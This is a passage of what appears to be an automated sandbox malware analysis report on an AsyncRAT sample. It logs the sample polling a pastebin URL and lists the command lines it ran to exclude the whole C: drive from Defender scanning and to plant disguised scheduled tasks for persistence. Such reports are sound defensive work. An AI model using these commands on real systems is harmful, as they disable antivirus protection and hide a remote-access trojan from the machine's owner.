                                                             3 | 192.168.2.5 | 49819 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:13:01 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             2024-12-09 13:13:02 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:02 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 19
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5400bbd2bc439-EWR
                                                             2024-12-09 13:13:02 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:13:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             4 | 192.168.2.5 | 49844 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:13:11 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             2024-12-09 13:13:11 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:11 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 28
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540458cac8cdc-EWR
                                                             2024-12-09 13:13:11 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:13:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             5 | 192.168.2.5 | 49869 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:13:20 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             2024-12-09 13:13:20 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:20 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 37
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5407ecc2bc32d-EWR
                                                             2024-12-09 13:13:20 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:13:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             6 | 192.168.2.5 | 49894 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:13:29 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             2024-12-09 13:13:29 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:29 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 46
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540b8092f0f78-EWR
                                                             2024-12-09 13:13:29 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:13:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             7 | 192.168.2.5 | 49919 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:13:38 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             2024-12-09 13:13:38 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:38 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 55
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540f16b119e16-EWR
                                                             2024-12-09 13:13:38 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:13:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             8 | 192.168.2.5 | 49942 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:13:48 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:48 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:48 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 65
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5412ced860f70-EWR
                                                            2024-12-09 13:13:48 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.5 | 49968 | 172.67.19.244 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-09 13:13:57 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:57 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:57 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 74
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54166fb16421c-EWR
                                                            2024-12-09 13:13:57 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.5 | 49994 | 172.67.19.244 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-09 13:14:06 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:14:06 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:14:06 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 83
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541a0090d185d-EWR
                                                            2024-12-09 13:14:06 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:14:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Target ID:0
                                                            Start time:08:11:54
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\Desktop\rrats.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\rrats.exe"
                                                            Imagebase:0xca0000
                                                            File size:506'223 bytes
                                                            MD5 hash:A2BDB024C98B7E8D3D06FC86E110D204
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:08:11:55
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:08:11:55
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:08:11:55
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:a.exe -p1234
                                                            Imagebase:0xe80000
                                                            File size:308'705 bytes
                                                            MD5 hash:7107F3FB53F9F3EAF3B95FD857F7AEE9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 17%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:08:11:56
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe"
                                                            Imagebase:0x200000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 82%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:08:11:57
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:08:11:57
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:08:11:57
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                            Imagebase:0x170000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'
                                                            Imagebase:0x2e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:timeout 3
                                                            Imagebase:0x620000
                                                            File size:25'088 bytes
                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:08:12:03
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Imagebase:0x7a0000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 82%, ReversingLabs
                                                            Has exited:false

                                                            Target ID:17
                                                            Start time:08:12:04
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Explorer.exe"
                                                            Imagebase:0xfe0000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                                                            Imagebase:0x2e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                                                            Imagebase:0x2e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:08:12:09
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Local\explore.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\explore.exe
                                                            Imagebase:0xcf0000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\explore.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 82%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:08:12:09
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /C powershell Add-MpPreference -ExclusionPath C:"
                                                            Imagebase:0x7ff78f3a0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:08:12:09
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:08:12:10
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Add-MpPreference -ExclusionPath C:"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:10%
                                                              Total number of Nodes:1575
                                                              Total number of Limit Nodes:43
execution_graph: machine-generated node and edge dump (function addresses, resolved API calls and call-graph edges) rendered in the report's graph viewer; not reproduced here.
